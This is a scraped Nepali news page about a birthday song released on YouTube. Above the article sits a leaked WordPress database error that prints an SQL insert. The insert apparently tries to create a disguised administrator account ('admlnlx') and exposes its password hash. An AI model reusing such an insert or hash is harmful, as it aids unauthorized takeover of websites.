WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIVKEyJq1ugNrY2TXlJ11PPrLbJFzc/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:25:07', '', 'admlnlx', 'admlnlx')

सुबास जमरकट्टेलको रचनामा बासुदेव कट्टेलले निर्माण गरेको ‘जन्मदिनको शुभकामना’ गीत युट्युवमा – Gaule Khabar

सुबास जमरकट्टेलको रचनामा बासुदेव कट्टेलले निर्माण गरेको ‘जन्मदिनको शुभकामना’ गीत युट्युवमा

सुबास जमरकट्टेलको रचनामा बासुदेव कट्टेलले निर्माण गरेको ‘जन्मदिनको शुभकामना’ गीत युट्युवमा

काठमाडौं। सुबाश जमरकट्टेलको रचनामा रहेको ‘जन्म दिनको शुभकामना’ बोलको गीत गाँउले इन्टरटेन्मेन्ट युट्युवमार्फत सार्बजनिक भएको छ। सो गीतमा संगीतकार जसिहाङ राईको संगीत र मुना राईको स्वर रहेको छ । गीतको मिक्सिङ दिनेश राजबाहक र सम्पादन गंगाराम राईले गरेका छन् ।

गीतका परिकल्पनाकार कुन्तादेवी कट्टेलका नातिनीद्वय प्रेमा र सुदेश्ना कट्टेलको जन्मदिनको अवसर पारेर सार्वजनिक गरिएको गीतको निर्माण भने बासुदेव कट्टेलले गरेका हुन् ।

हाल गायिका मुना राईको सुमधुर स्वरमा आएको गीतको मेल भर्सन अर्थात पुरुष गायन पनि छिटै नै बजारमा ल्याउने तयारी रहेको निर्माता कट्टेलले जानकारी दिए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका